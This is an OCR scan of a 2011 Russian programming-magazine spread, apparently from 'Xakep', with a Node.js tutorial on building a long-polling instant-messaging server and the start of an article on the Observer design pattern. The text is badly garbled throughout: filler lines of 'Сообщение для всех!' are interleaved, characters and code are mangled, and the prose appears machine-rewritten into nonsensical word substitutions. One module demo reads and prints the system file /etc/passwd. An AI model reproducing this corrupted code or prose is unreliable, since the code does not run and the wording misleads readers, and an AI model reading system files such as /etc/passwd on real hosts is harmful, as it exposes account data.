С ообщеtmедпя всех! Сообщсниед11Я всех! Сообщснисд1U1 всех! СообщсниедnJI всех! Сообщсшmд1U1 вссх!
С ообщение д11Я всех! Сообщсtmе дJlЯ всех! Сообщс.tоtе ДJ1JI всех! Сообщение ДJ1JI всех! СообщСJоtе дпя всех!

си вместе с темой, проце не без; самочки alias вместе с оздания НТТР -се рверов б е зо на со моя особа ко равно х брау­

Сообще1оtе к всех! Сообщсtmс с целью вссх! Сообщение АЛЯ всех! Сообщеtоtе дпя всех! СообщСJоtс д1U1 всех!
С ообщсшtед,nя всех! Сообщениедпявсех! Сообщеtmеддявссх! CooбщcJoteд.nJI всех! СообщеJmедпявссх!

зеров равным образом на любом окружении.

С ообщеtmс д.ля всех! Сообщеtmс дпя всех! Сообщение чтобы всех! СообщСJоtс А11Я ВCCJt! Сообщеtоtс дnя всех!

Чтобы было понятнее, погодите держи код, каковой со з ей-ей вместе с тwеЬ ­

~

С ообщсtmе с целью всех! Сообщение ДJ1JIIICCX! Сообщсtmе дпя всех! Сообщеtоtе дnя всех! Сообщс.Jше ддя всех!

С ообщсшtе д11Я всех! Сообщсtоtе пользу кого вссх! Сообщешtс д11Я всех! Сообщсtоtе дru1 всех! CooбЩCJDIC дпя всех!
СообщеtmеДflЯ всех! Сообщсtmсддя всех! Сообще~mецпя всех! CooбщCJoteДJ1JI всех! CooбщctDfCWUIВCCXI

от ерв е р, э доровающий из автор вместе с в рассуждении мной:

Сообщение ДJ1JIВCCX! Сообщсtоtс дпя всех! Сообщсtоtс дпя всех! СообЩСJоtс д1IJI всех! С ообщсJmе дпя всех!
Сообщс1оtс дпя всех! Сообщеtmе A11J1 всех! С ообщсtоtе дпя всех! СообщСJtнС wвссх! COOOщcJot:C дns1 всех!

var http=require (" htt!Ll.,_
·-------------!tl: tp.createServer(fJ,Jnctioп (reg).!_g~t , respoпse)_{__
respoп_se.writeHead( 000, {~пtепt- TypEt" : " te x t / plaiп " });
rеsропsе.епd(" Привет, Кононенка!
}).listeп( 00~,

" );

"127.0.0.1" );

Сообще1mс ДЛJ1 всех! Сообщсtmе АЛЯ всех 0СообщсtоtС АЛЯ всех! CooбщeJDIC д1U1 всех! Сообщсtоtс дпя всех!
Cooбщctnte с целью всех! Сообщеtоtе дпя всех! Сообщение цnя всех ! Сообщение Alll всех ! СОООщсние мя всех!
Сообщение пользу кого всех! CooбЩCIDfC дпя всех ! С ообщсtОJС АЛЯ всех! Сообщешtс дпя всех! СообЩСJОfе дпя всех!

Сообщсtоtе .U.."lЯ всех! Сообщенисд.11JI всех! Сообщеtmс дпя всех ! CooбЩCIDIC дпя всех! Сообщсшtс цпя всех!

Вэrnядсостороны клиента

coпsole . log(.:Ц~ зanyJYgJ:LЬtt ~L1П.0 . 0.1:8080L)_;_ _ _ __
returп

А вотта для автор е го з апус тим:

Math . PI • r • r;,__________________

}_;
exports.circumfgreпce=fuпctioп

% поdе

имя_файла_скрипта.js

~ервер запущен

http :l/127.0.0.1 :8080/

returп

(r)_ {

0 • Math.PI • r;

};

По н ятное обязанности , что такое? чем прив е тс т на ия м ожно выдав а ть <html>
<head ><title>... следовательно ужотко . ;! Кроме бы ст р ой отдачи з абавны х привет­

из во в отношении его модул автор этих строк да мы из тобой опр е д е ля ем на н е м любы е не без; вои методы , которые

со твий равно от татичной на е р от т для равным образом м ожно сбыть практич еск равным образом который угодно!

в соответствии с со л е будут до самого не без; тупны извн е lагеа да из iгс umfегеп со е-в примереl . Во из ­

<< Какой быстрой? Ява от крипт- сие ж е медленно! » - во вместе с помнишь

Зде не без; ь на со тр е ча ется вто р ой гл об бальный по части бъ е кт-ехрогts. Внутри

пользуем из ваш покорный слуга э тим модул е м:

твоя милость да будешьотчасти прав. Но равным образом тутовник моя персона могутебя порадовать! В кач е стве
Jа vаSсгiрt-движ ка во

Nod e используется непр е взойденный г угловскийV8,

а м одель ввода/выв похвала кайфовый внутренно от тя х равно не без; ключительно а от ан х ронная .

var circle=reguire(" ./ circle.js" )_;
coпsole . log{_:_oдQ]цi!.!IJLI~J>YГi!_~_pМ!!)Icoм

0 р_авна %d " ,_ _ _ _ __
circle.area (1)_)_; _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

Вм сделал те этодаетбл е стящую от коро не без; ть, достойн у ю вам от касательно конагруже нного
се рви от а . До ко азатель ст на касательно м э тогоявля етс ваш покорный слуга то, ась? прямо получи и распишись Nodeyжe

усишко пешно реализован сервер обмена мгн относительно венными сообщениями возьми

Чтобы выве из ти место кр у га получай экран, наша сестра пользу е мся третьим

<< В Контакте >>, а олигодон местами , а с годами мощность ого - го. К слову, одну каплю похо­

глобальным объектом -console, предназначенным про вывода во

жий от ервер я да н а пишем, хотя вначал е н е бездна мануальн что касается й те ории .

stdout да std eг г. Метод log[l- этo ргiпtf-подобный путь [Классически й
фор м атир в отношении ванный выведение на Ja v aS c г i pt- этo со ча из ть е. - При м . р е д.l

НОВОВВЕДЕНИЯ В

NODE

к вывода на stdout, мето д е гг по отношению гll-то ж е са мое интересах s td e гг. По вместе с л е часы й

Первое, в чем дело? могло бр ос ить не без; аз многогрешный на гла з а на прив еденном сверх со ползучесть те,-

интере из ны й гл в рассуждении бальный объ ек т- э в таком случае

сие require. Н славословие на се интересненькое равно гото на е нькое !то есть ть под все!

обследование надо исполнением т е кущего процес от а. Воттолько нек по отношению торые

process, д а ющий нам полны й

мол ржит во специальны х модуля х . Именно равным образом х равно подгружа ет многоохватный текущий

с его методов равно объек т ов , которые совершенноточно пригодят не без; пишущий эти строки быть

метод. Часть модулей написаны получай С++ из либ а ми V8, ча вместе с ть непосредствен­

больше сиречь м е н е е серье з ном программировании из ерв е ра :

только возьми Ja vaScгipt "e . Само вместе с тоятельно JS-м одуль содеять оч е нь прямо :

process.stdout, process.stderr равным образом process.stdin- потоки от тан­
дартного ввода/вывода. Для первы х дв ух рецепт wгite на пакши , равным образом

Haw

мо.gуль

circle.j.,._
s_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

п по отношению лучитс моя особа c oпco l e . l o g да вместе с оп s оlе . еггог, а вона прием std iп - этo у ж е

инт е ре из нее . Nоdе-платформа событи й да - ориентированная,

exports.area=fuпctioп (r:L.t -- - - - - - - - - - - - - -

а со ан х ронн а автор . Поэтом у дляпол у чениястандартноговводаопреде­
ляется простая занятие ко из обытию :

poll ingtest: xoker kononenko$ sudo node server . js
соединений!

_ J:!.rocess.stdiп.oп(" data " , fuпctioп (chuпk)

Отсылаю сообщение!

01

Отсылаю сообщение!
Отсылаю сообщение!

_ _process . stdout . write ("d ata:

Отсылаю сообщение!

_

})_;,

Отсылаю сообщение!

{ ___

_

печатаем произведенный мандара

____

+

chuпk) ,_·-------~

.

Отсылаю сообщение!

Функции, которые указываются во кач е стве аргумента, - э ведь

Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!

Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!

саiiЬа вместе с k-фу нкции. Они со рабатывают пр равно некотором событии . В
э том,к от тати,ився су ть не без; обыти й нойориентир об ванно не без; ти , хотя э тоты
на не без; е пр ек расно знаешь .

process.argv- ма из сив

от аргу ментами командной вместе с тро для и, заданны ­

ми присутствие запуске .

Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!
Отсылаю сообщение!

U

печатаем ар сументы

_grocess . argv.forEach(fuпct:ill!L_(val,_io dex,
coпsole.log{iпdex

Вэrnядсо стороны сервера

ХАКЕР

00 / 053/20 01

array)_ {

+ " : " + val)_;,_ _ _ _ _ _ _ _ _ _ __

_ })_;· - - - - - ·

005

КОДИНГ

process.cwd()- рабочая директорий процесса.
process.pid, process.getgidll process.getuidll -текущий id процес­
са, а тоже

gid да uid.

СТАНДАРТНЫЕ МОДУЛИ

NODE

process.kill(pid, signai="SIGTERM") -убьет предопределенный процесс.
process.exit(num)- завершиттекущий движение . Кстати, течение
завершения позволительно отследить, зарегистрировав соответствующее

а сверло модулей

событие:

нииоченьбольшогоколичествасофта .

Node.js удовлетворяет потребности быть написа­

Смотри сам:

functiQD_()_{______________________ _
___ __hQ_~ole.lP.gC.f.L.:U1ю ••• та_~g_,_._ ,~.); _____________________ _
_RJ:Q.!:_g_~~.QпCe-"\.lt~,_

---

• fs- модульдля работы не без; файловой системой. Есть методыдлялюбых
операци~отчтенияизаписидосозданиясимволическихссылок.

_}) ,_
·

Прочие глобальные объекты равным образом их методы поуже нетакие интересные,

зато в чем дело? интересно, таково сие модули, которые позволяется прикрутить для
Кэтому моменту твоя милость вынужден соверЦJенноточно понять, аюшки?

Node.
Node.js

____fhr eac!File(_"/etcLRasswd ", function (grr, datg_)_~.--_ _
__if___(err:) throw err;
___hQ_nso.lg_,_:),Qg_(data);___________ _
_ }.);

____

-это пустой номер круто. Я, например, вспомнил, который всю общежитие всего
равно мечтал, что такое? известить личный веб-сервер! И лишенный чего каких-нибудь после этого

crypto- криптографические методы: хэ ширование любыми ал­
горитмами [sha1, md5, sha256, sha512 равно т. п.), конвертация данны х

унылых СGI-скриптов, а не без; сокетам да , пустьдаже «веб»! Теперь сие несложно

и, собственно, что бог на душу положит шифровка .

реализуемо.

net- часть в целях асинхронной
БИБЛИОТЕКИ ДЛЯ ЭМУЛЯЦИИ
СОКЕТНОГОСОЕДИНЕНИЯ
Мгновенность сообщений нашего сервера будетзаключаться во том,
почто факты посреди пользователями будут подаваться не принимая во внимание задержек

во стиле гeal-time

web . Обеспечиваться

сие будете через эмуляции

постоянного сое динения сб ра узером.Самаясове ршеннаятехнология,

работы со ТСР.

_____________________
v а r s е rve_r=lle:t.-".reil.:t.e.$_e_r_v_e_r.{f_u n ctiQП_(_(:_)_{ _______________ _
__cд~.r.ite.Cмl:J,Q\r\~);, _ _ _ __
__c_.J2ip__g_(.(;); _ _ _ _ _ _ _ _ __

__}.);

постоянноедвухстороннеесоединениесбраузером,ксожалению,
поддерживается только лишь новыми браузерами. А отечественный дальнейший сервер
повинен суметьдать истинный реалтайм-веб любому клиенту! Для

создания реалтайм-веб-приложений существует бессчётно различных

UDP- равным образом другими датаграмны­

events- интересах реализации своей событийной системы.
util- пакет полезных методов: форматирование строки,

Очень популярная читальня

Soket.IO порадует красивым ди­
зайном главной страницы проекта http:Usocket.io/ да приличным

при­

нудительное юниорат .

лать следовать вас. И она, конечно, делает. Поддерживает кучу способов
соединения: с новы х веб-сокетов по вечны х айфреймов. Новая

работы вместе с

ми протоколами .

решений , так в целях нашего случая их только ничего:

в количестве плюшек равным образом свистелок. Она обещаеточень многое из де­

dgram- чтобы асинхронной

tls-имплементация

OpenSSL, в таком случае

естьудобные SSL-соединения

пользу кого твоих программ .

vm- виртуальная JаvаSсгiрt-машина, т. е.

узел чтобы запуска равно

издание позволит зажигать серверные события, сопровождае­

компиляции [eval сего малограмотный умеет) js-скриптов в середине своей про­

мые данными. В Сети мелочёвка гуглится груда тутариалов равно примеров,

граммы.

описывающих то, по образу сия библиотечка удобна да крута.

Гораздо не в подобный мере популярна [а зря!) библиотечка Beseda, которая
делает грубо так но самое, да и то имееттолько репазитарий получай

пробег хабе [goo.gi/9SoJR ). Она поддерживает гнущийся отчёт Bayeux

---·--------

__ _j.J_~;i.д gscr_ipj:_, eval.eJI.,____ _
___v.m-=-.J:_e.g uire (_"_vm ") ;____________________________________ _

итриспособасоединенияссервером .

_ using~J; riRt=vm.runiiJI!:!j.sContext Cl_ocalm__=..l; ~-------___"my__fil~vm."_); _ _ _ __

Достоинствомобеихбиблиотекявляетсят~чтоихдействительно

console.lo_g_(" localVar: " + localVar +
", usin~c.r:.!Rt: " + u_~.io.gscr:.!P-1);_________________
__iLloc alV_ii!:~-~-n_.__ using ~cr.iQ!_: 0

легкоиспользовать.Правда,Sоkеt.IОпло хоработаетсо всемиспосо­
бами поддержки соединения, за исключением веб-сокетов. Также случаются
прибыль памятиинеобъяснимые падения сервера быть условно

небольшом количестве клиентов [более 0000). А во Beseda вне веб­
сокетов на ять справляется да вместе с

00 000 клиентов. Да

dns- резолвинг любы х записей [М Хи т. п.) .
http, httрs-добротные да быстрые реализации wеЬ-серверов.
child_process- усилие из дочерними процессами, фор к, ехес,

spawn равным образом т. n.
os- все, зачем

равным образом из веб-сокетами

возлюбленная работает в области юрче .

НАПИШЕМ ЛУЧШЕ!

нужно ото операционной системы.

Чтобы паче осмыслить на новую технологию, спокон века небесполезно придумать
велосипед. А особенно хорошо, ежели аквапед склифосовский быстрый.

_ Как показал выше- эмпирия работы со

Node.js да

JavaScгipt, нежели проще­

тем быстрее. Поэтому аж на реального применения своя библио­

Есть до этих пор купа да стандартных модулей, равно нестандартны х, написан­
ных сторонними разработчиками: ото модулей в целях работы MySQLдo
полноценныхвеб-фреймворков.

тека можеточеньдаже сгодиться. Состоять наша читальня хорош
изо одного файла

io.js. А на

проверкии отладки уже двум -сценарий

сервера serveг.js равным образом период клиента iпdex.html.

Самым универсальным способом охранять постоянное соеди­
нение не без; сервером является lопg-роlliпg-соединение, следственно пользу кого на­
чала реализуем его. Нам важно, с тем выше- сервер был способным помогать
кучусоединений,нетекинетормозил.
После долгих да упорных ковыряний во исходниках, отладки равно
профилирования

Soket.IO

виновник падений равным образом тормозов, относительно которых

мы говорил выше, была найдена! Это тайм-ауты, обрабатывающие

006

В КАЧЕСТВЕ JS-ДВИЖКА
В NODE ИСПОЛЬЗУЕТСЯ

НЕПРЕВЗОЙДЕННЫЙ
ГУГЛОВСКИИ

V8
ХАКЕР

00/153/2011

JavaScгiptдля сервера

Процесс разработки

каждое сращивание из клиентом. Каждый разновременный цикл, под­
держивающий логику обработки lопg-роlliпg-соединения, ест мно­
го ресурсов . Поэтому приходится приложить все старания урезать по сию пору на единодержавно цикл. Для
сего каждое сцепление представим << плоским >> набором данных,

01 ... да имеет материал либо_долго висит бе3 обстановка
__if_(gollingData.dataOueue .le..ng-""t!!..
h _ _ _ _ _ _ _ _ _ __
___ LJ_gollingData.loogCount --- е)_ _ _ _ _ _ _ _ __
flush(polliпgData); //_,_,..&Q paQ>Iвaeм ег_
о_ _ _ _ _ _ _ _ _

некоторый хорэ иметь на иждивении информацию по части том, во экий мгновение его

}

никуда не денешься обнулить, отправив предмет клиенту. Для сего на
файле

io.js напишем нижеследующий шифр :

//_ИJ:j_Ig!H!.<t!J_ПP.9~1Q! .. Ji!lill!ЧИЯ HQ!!.Ь.llUiaHHЫX,_______

var CHECJCI_NLERVAL

LL

=188~;

Максималь~ьнQ!:~ че~Т!!о_ итераций перел

01 обя3ательным "брасом
var MAX_LOOP_CQ.UNT=18; _ _
/LJабдица соед!1.!!ений
_ _ __
y_ar coпnections- {};,___________________

}
}

fun ction flu!;h_(gollil}gDa.ti!)_{_ _ _ _ __
goll i ngDa t _g_, r e..s.QQ.O se ,_r,ш..Q.(g что касается ll i ngDa t а . c!i!...ti!.QuJ!. u. e...j.Q.iп.C..J~))~-_gollingData.dataQц_eue
polHngQata . r_e~pQПse=

=[].;____
nul..l;

}

setinterval(mainLoopiteration, CHECK_INTERVAL).;_
Каждуюитерациювсесоединенияпроверяютсянаналичиедан­

ны х или — или для азбучная истина . В случае, коли на переплетение пришли информация либо,

LLlli!..tili\ill!__cQ.eA.инeния
va c..J,.Q_ngPolli..ogQilj:a=function () {
thi!;_.IoopCounj:=MAX_LOOP_COUNT;
this .dataQueue....=[];
_this . resgon~e=nuЦ ;, _ _ __
};

_________·----------------·---------------

Ll

Итера~я основного ~~л~a~-------------­

f u..o.tli.on mainloogiterjltj.Qll.()_{
var pQllingDat!l;
fo c_(var id in щnne ~tjon~) {
J ollingData=connectipns_[idj; --·-- _
_ _ _ __
_jf_(gollingData . resgonse)_{....LL Если клиеi:!LD.Ql!""к.!.!л."_
юч
""е.,н,__ __
_ gollingData.loogCount--:~·----------

ХАКЕР

00/153/ 0011

наоборот, давнёшенько ни плошки далеко не приходило, летящий требование обрывается от

отправкой данных . После ась? жертва повинен ругнуться матом новейший запрос.
Практически книгохранилище готова! Теперь необходимодать возмож­
ностьклиентуполучатьсвойидентификаториобрабатывать • долгосрочный »
задание данны х, а да записыватьданные на соединение.

var lastiD=е;....LL..Идентификато ~СQ соед,.,и""н"_
ен
шишя,______
01 Ре.Qi страция клиента равным образом В~I!Раl!!.ение его идg_нтифи_к_;tiQРа __ _
var init=exports.init=function (req]J!!st, resgQП_se) {
var id="connection_" + ++lastiD;
_connections[id]=new LongPoll_ingDataJ)_;_ _ _ __
~gonse . end(iQ)~.------------------};,

_________________________

007

КОДИНГ

.L~ржание» зan_I)QgJ_Д2!fHЫ>\.S.QМJ!_t-!!~.!i!"!.!L ___________________________ _

YQrШtd_=е КP.Qrt 0 ._h об 0d

=f

цn ct i оп (iQ,_r_g_g_
y_e5t

_y__ш:_ J2Q.l.l:ingQ.~ta=connection~(_:i,_cj_J;
_j._U pollingl:)ata._re_~poд5e l==_n.JJl l) _ _ __

, __re 0ро n5 е) __{_ ______ _
-----------------

_ fly~b(p_o_1_lingQat_a); - - - - - - - - _12Ql1ingDat~~PQ.IlS.e --=._c_gspQD5~;
___________ _

ТИПЫ ПОСТОЯННОГО СОЕДИНЕНИЯ
С БРАУЗЕРОМ

_pq_l_]jngQ.i!ta .1oopC.Qцnt_:;.l"U\_~_!.QQP_hQ_UШ.; ____________________ _

а определённый моментсуществует

};

nять способов поддержки постоянного

LL_~;m-~-~.!>..д~J:iHЫX...e.J&eШШg_I:J]"!_e_ ____________________ _

соединения из спринклер ром:

_________________________________________

y_ar wr.ite_.::_eXPQL:!:5. wri te_::..f~ n ~ tio o_(j__Q, __g_a_ta) _{__ ____________ _
var polliQgD__g_t_g=_<;Qnn_e_ь tion5[i_9);
______
_pollingQaj:_;;~_._cjataQueue.pu5h( new Buffer_(datь_tgSj:ring_())J; _ _

______

}

WebSocket"ы- выполнимость новы х браузеров подпирать со­

кетное связывание по части протоколу НТТР.

FlаshSосkеt"ы-эмуляция WebSoket"oв около помощи специальной

·----------------------

флешки. Способ возможентолько быть наличии флеш-плеера.

_______________________ _
y_gr__!1.r__g.a_9 из а 0t=е х ро rt ~ Ь ro а d вместе с а 0t _::_ f un c :tj,Q!l(cj_~tg)__{ ________
_fQL(y_g.r_j__!:l_ j n conд.e..GJQ~) write (;i.,Q_,_qg_t_g); __________________ _
LL_1_gnиcь данн~х._е~~;_е coeдюt.e.~_l:t!L

Long роlliпg- « долгоиграющие >> требования . Способ ,

какое-то миг по появления новы х данны х, задним числом а отвечает равным образом

----------------

}_

около котором получай

привычный НТТР-запрос сервер никак не сnешит отвечать, а удерживаетего
закрывает соединение. Также возможен вариантсjsоnр-форматом
ответа. Способ поддерживается всеми браузерами.

Чтобы выехать нашей библиотекой, используем еще

Multipart streaming- дозаписывающийся

знакомое термин гequiгe:

протест сервера. НТТР­

запрос, что можетчитаться отнюдь не закрываясь. Поддерживается

.Y<!.L_i.Q_=

лишь только Fiгefo x "oм .

reg_yJ.r.e_( _"_,_Lmy_ьg ol ]j.Q.rgryЛQ,j_~ )_; _______________ _

iQ,Ь.roadca5t t_o pj!_~p<!.~!:i_O_e __~_QQYI!lli~ ;_______________ _

Forever lfгаmе-вечный айфрейм ,

во некоторый дописывают ся новые

порции данны х. Способ поддерживается всеми брауэерами .
Теперьдавай попробуем нашу библиотеку воспользоваться относительно
главный цели статьи, так естьдавай сделано напишем се рвер мгновенных

сообщений. В файле seгveг.js запишем:

0.?_cr:i,pt> ----·--------------------------------------Y.МS..QD.e.c tioniD ;___ ______________________________________ _

va r htlp_:_reg_цir..e..Ciltt.Q." l, ______ _
_ fs ...:;..r..e.g uire(~)_,
_ iQ=__r_e.quire_(_"__. Li o .j_s" ); _L/_нaшa! _
Y<!L~r_y_er

=httP. .cre_ate.s.e..c.Y.er-0;____________________ _

serve.r,_;~_9_9_~_ьtener.Cr eq!,J~$_i~,_b.an.91eftg_g_ц_e_~_t)_; ___________ _

~r ver .lj,5teJJ.(!~,__"], o c alЬ.9.tl.~J;

function connect_()_{ __
_$_._J105t( :".htlR;_Lf.)..Q ca1host /..::,_f_unctio o_(dat;J.) {
_____________________________________ _

_ p_Ql_l_(_)_;__ _______________________________ _

_______________________________
__________________________________________

_});

_______ _

}_

f unction hand_leReJ!Ue5t(regue5t,__r_e.5pQD5e)_{ __
i f (regue5t.method .===-~EOST" )_{
_ _ _ _ _ _ _ _ __
""-- io~ tд!.t_(r.e.gue5j:_,__r:g_s_pgм_g); _________________ _

_}_E!l .?_e__{_ ________________________________ _
__i f (Г__е_q_у.е~:!;,ц.r1===- -"L:__Jj_r_g_g ue 0t . ц.r_1__:о_:;_",_:д nd ех . ht m1" )_{ ___ _
function _(er_r,__content)__L _____ _

~~dFile(_"_,_/j_nqgx.J)j:_m 0" .

~129~~ en_c:!_(.~ontent);

functio n hand1eData(data)_{
data=data~-~P1Ш."..I."..).;
while (.c:tgj:_q~J,ength > 0)

---------------------__j_CQQ_gy~),.a_J:!pen_ci.(gata. 0hift()_.±....".}p~)_; _______________ _
_pgll()_;_____ _
}

______

_ });_
}

е15 е

{

__ j _g_,bgJQ_(r.e.gy_e_5t
____}_
_}
}

.ц.rl,_s_p1il.CL)_,_pQp_(),_r..e_g_y~_$j:,_r e 0 p_Q.!l~.el;_ _

------

_________

-------

_______

funct i o_o_poll(_)_{ __ - - - - - - - - - - - _$_._get ("h1;_tQ.;./.L 0oc 01tш.li/..:...t._conectJgдJJ), _lJшl!i1e.Oata);______ _

_____________________________________

}

-~J]_o_~_t();_____
0_L 0criR~
tL
>

!L Кто-то

----________________________________________

всех почасту

0e:!;Interv~_(fцш~_tion()

___________ _

Вотвесьнеоб хо димый рабочийскелетдля сер верамгновенных

соn5о1е.,]_Q_g( "Отсылаю от ообшениеl".)_;,_________________ _

сообщений. Пока некто умеет на реальном времени распределять по всем статьям со­

iо,Ьrоаdса5t( "Сообшени е про всегда х !" ),_,_·_ _ _ _ _ _ _

общения, да и то но у него ужас великоватый потенциал. Несколькими
строчками дозволено короче посоветовать выше- сервер, например, обменусо­

}_,_500);

общениями посредь пользователями другими словами работе со базой данны х - во
POST-зanpoc короче восnриниматься нашим сервером как бы регистра­

общем, чему угодно.

ция нового клиента, а GET-зanpoc вида <</и дентификатор_к лиента >>
хорошенького понемножку воспринят в духе « долгоиграющий >> запрос. Ну а в целях эмуляции
интерактивности каждые

000 миллисекунд короче отправляться сообще­

ниевсем пользователям .

От клиента ожидается, что-нибудь спирт довольно регистрироваться, поддерживать

выво

ы

Можно весь уяснить , благодаря чего Node.js приблизительно аллегро набирает популяр­
ность, экотон ра из тет, а библиотеки плодятся что хом ячки .
Еще бы, однако в настоящий момент каждый, кто именно хо ть толику наслышан со

комбинация равно переподключаться. И никаки х специальных клиентских

Ja vaSc гipt"oм , может пересчитывать себя серьезным системным программи­

библиотек. Что, кстати, так а не грех квалифицировать в духе недочет описан­

стом! Каждый об эту пору сможет обернуть унылую статику во захваты­

ны х вне библиотек.

вающую интерактивность, а может вовлечь растущие nро ек твоя милость во

Клиентский шифр напишем напрямую на index.htm! {заранее подключив
jQueгyl:

008

пучину со пагетти стих из каскадами замыканий равно заворотами асинхрон­

утнапиштим логики ... Будем гадать нате лучшее . :Х:

ХАКЕР

00/153/2011

КОДИНГ 0 Т1 PS&TRICKS

deeonis ldeeonislagmail .coml

Паттерн
проектирования

На блюдател
Продолжаем замазка от паттернами объектно­

редставим ситуацию, сколько нас взя л равно для работу во крупную фирму,

ориентированногопрограммирования . Сегодня

терногожелеза . У них е вместе с ть незнакомый шофер , кто отслежи­

котораяразрабатываетсофтдлямониторингаработыкомпью­

ты да я узнаем что касается паттерне « Наблюдатель», некоторый

ваеттемпературу процесса, обороты

облегчил бытье многим 00-программистам .

пр очую информа ц ию. Н а ш а загадка нате 14 сать клиентскую порцион софта,

HDD, температуру видеокарты

равным образом

ту, которая работает на гiпg-3 да выводитэту информацию п ользователю

Любая система, работающая на режиме реального

во режиме реального времени. Причем список должна малограмотный п росто

выв что до ди ть ан фу-ты на кучу, а выражать ее н а разных <<экра в х>>. То сделал ть

времени, во праздник alias разный степени может исполь­

в отношении д инмодульклиентскойчас т изанимаетсяотображениемсостоя ни автор этих строк

зовать оный паттер н, равным образом потому-то его разумение равным образом пони­

центрального процессора, другой породы модуль-графического пр оцессара

повеление попросту необходимолюбомууважающему

равным образом т. д . Д а равно что оказалось, н а ш е новое вождь решило замах н уться
получай мировое империя равно хочет, так чтобы софтбыл расширяемым , в таком случае питаться

себя кодеру.

чтоб сторонние разработчики могли учреждать близкие мо д ули .
В елдык через нашего пр е дш ественника нам дос тался ко ла сс
System lпf o, каковой во теории пр едназначается на сбора инфы в рассуждении систем­

ном железе да оповещении клиентской части об изменениях на состоянии

ObservaЫe

доля работы соответственно коммуникации класса Systemlпfo из клиентскими модул я­

ConcreteObservaЫe

-observers: Observer[]
+дddObserver(o: Observer)
+RemoveObserver(o: Observer)
+NotifyObserv.er()

Первоначальный 0!J1риант класса

насчёт ..

* ..1 «interface>>
•1 Observer

00 / 053/ 0011

class
_{

0

ConcreteObserer

0

+HadleEvent()

Systemlnfo

Systemiпfo()

_______

0

~

HadleEvent ()

у каждого наблюдателя

ми легла в ваши закорки . Для началадавай взглянем, аюшки? у для со есть.

«Наблюдатель»

Observer)
+RemoveObserver(o: Observer)
+NotifyObserver()

ХАКЕР

хоро ш о, в таком случае вторую спирт т олько начал реализовывать, да поэтомуосновная

классов паттерна

+дddObserver(o:

Вызывает схема

зтогоже л еза. Если со п ервой ча стьюуше дши й изо фирмы коде р из пр а вил ся

Диаграмма

« interface»

0

_.fi_Q_at getCPUTemr.IO;
float getGPUTemp();
int getHDDSpeed();
_y_oid~OQt_ifyЛients() ;_

0

009

КОДИНГ /TIPS&TRICKS

Методы

getCPUTemp, getGPUTemp равным образом getHODSpeed предназначены

к получения информации через др айвера. Там всё просто, равным образом позтому они

Интерфейсы

Subject равным образом Observer
class Subject(),___ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

работают как бы часы. Та кже как не быть мето д пotifyCiieпts, котишка орый, разбирательство ваш покорнейший слуга в соответствии с

:(

комментам ва ш е го пр е дш естве нника , д олжен что касается п овещать клиентские

puЫi c:

void registerObserver(Observer &obs)=е ;
void removeObserver(Observer &obs)=е ;

модули об изменениях во sos тоянии сис т емы . Этот средство вызывается

гд е-т по отношению во утроба х класса System lпf o. Как з т об д е ла е тся, н ам со во сем н е
важно, гл а вн ое то, чт по отношению пotif y Cii e пt s срабатывае т возле каж д ом апдейте
инфы что касается железе да клиен т ские модули безошибочно нич его малограмотный пр работа т ят.

protected :._ _ _ _ _ _ __
void notifyObservers()-=-e;

НАЧИНАЕМ КОD,ИТЫ
Для н ачала нам нужно не без; д ела ть три основных модуля, которые
отображаюттемпературу пр оцессора, температуру видеокарты равным образом
стремительность вра щ ения

HDO.

Мы сделано знаем, зачем в целях в отношении п овеще н ия кли­

ентов используется цель пotifyCiieпts, равно следак н о, н а д касательно
а именно вручать ан фи с сего метода нашим модулям. Их у нас,
кстати, все еще просто-напросто три:

cpuTemp, gpuTemp равным образом hdd Speed. Каждый изо

class Observer()

{
puЫic :

void update (float t_cJlli,_f!g at t

}___________________

gJlli,~hdd)=е,.._·_ _ __

сих модулей долина но н уме ть извлекать д а нны е с Sys t eml пfo , объединение э книга у

Методы гegisteгObseгve гll да гemoveO b se г ve гll служат в целях до­

главнейший тип реализации пotif yCiieпts, который-нибудь около хо дит во голов у,
выглядит будто приблизительно :

ба вления /удаления в блю дат е л ей с сп равно ска подписчиков . Функция

пot i fyObseгve г sll хорош повещать наблюдателей, а путь upda tell
Peaлизaция_ notifyClients(),___ _ __

интерфейса ОЬsегvег буд ет выделывать сии что касается повещ е ния . Те п ерь

void_Systemlllfo()_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

подправим наши классы: System lпf o,

Cp uTemp, GpuTemp равно Hdd Speed.

{
float t_cpu=getCPUTemp();
float t_gpu=getGPUTemp() ;
int s_hdd=getHDDSpeed();
_ cp uTemp. URdate(1_@Q,_j;_gJ2!!,_s__hdd);,_ _ _ _ _ _ _ _ __

Реализация классов

class Systeminfo()
puЫic Subject
guЬlic :
reg is terOJ:J~grver( Observer

y pid
{

gpuTemp&pdate(tsJ2!!,__1_gJ2!!,_s__ hdd);
hddSpeed .updat e(t_cpu, t_gpu, s_hdd);

01
01

&obs)_ _ _ __

код, добавляющий ссылку для наблюдателя
на инвентарь не в таком случае — не то сосредоточение

Чт по части тут, собственно, малограмотный в такой мере ? Во-первых, основ ным принципом
пр оектирования вместе с п омощ ь ю патт ернов является программирова­

ние получай уровне интерфейсов. В нашем но случае группировка Systemlпfo

void removeObserver(Ob server &obs),___ _ _ _ _ _ _ _ _ __

д олже н з н ать подробную информацию относительно каждом клиентском

{

01
01

мо д у л е. Это, возможно, было бы приемлемо, разве бы цифра мо д долбленка
было фиксированным, да наша сестра пл а н ируем п остоянно увеличива ть их

код, удаляющий ссылку получи и распишись наблюдателя
на инвентарь либо — либо конгломерат

количество, а сле д ователь н о, таковой путь создаст кучу неудобств,
а с годами равно ошибок. В в рассуждении -вт орых, п ара метры, передаваемые

функциям updatell, беда смахивают получай интерфейс взаимодействия
в лоне

Sys t eml пfо

равно ко ли е нт ским да мо д улями, н насчёт таковыми малограмотный явля­

ются. Н у равным образом в-третьих, постоянно сии ваш брат зо вам ме т что до д ов upd atel l -этo пере­
м е нн ая ч асть кода, которую н литоринх н относительно инкапсулировать. Исправле н ием

protected :
void notifyObservers()

эт равно х н е д остатков автор сейте ча из равно займемся.

{

01

код, дерзкий путь

_Ll_для ка)l(,!lо_r_о_обьекта

